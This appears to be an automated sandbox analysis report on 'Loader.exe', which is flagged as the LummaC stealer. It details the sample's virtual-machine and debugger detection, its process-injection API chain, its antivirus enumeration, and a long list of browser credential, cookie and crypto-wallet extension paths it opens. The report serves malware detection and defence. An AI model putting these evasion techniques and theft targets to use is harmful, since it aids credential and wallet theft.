Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Loader.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Loader.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Memory allocated: 1480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory allocated: 3070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory allocated: 2E60000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Window / User API: threadDelayed 3544

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe TID: 7656	Thread sleep count: 196 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe TID: 7688	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe TID: 7760	Thread sleep count: 3544 > 30	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Loader.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\Loader.exe	Last function: Thread delayed

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Loader.exe, 00000001.00000002.2478791044.000000000107A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\Loader.exe

API call chain: ExitProcess graph end node

graph_1-22099

Source: C:\Users\user\Desktop\Loader.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Code function: 1_2_0044A860 LdrInitializeThunk,

1_2_0044A860

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_03072161 mov edi, dword ptr fs:[00000030h]		0_2_03072161
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_030722DE mov edi, dword ptr fs:[00000030h]		0_2_030722DE

Source: C:\Users\user\Desktop\Loader.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_03072161 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_03072161

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Loader.exe

Memory written: C:\Users\user\Desktop\Loader.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Queries volume information: C:\Users\user\Desktop\Loader.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Loader.exe, 00000001.00000002.2478791044.000000000107A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: es%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\Loader.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 1.2.Loader.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Loader.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Loader.exe.4079550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2477728323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1303335822.0000000004079000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
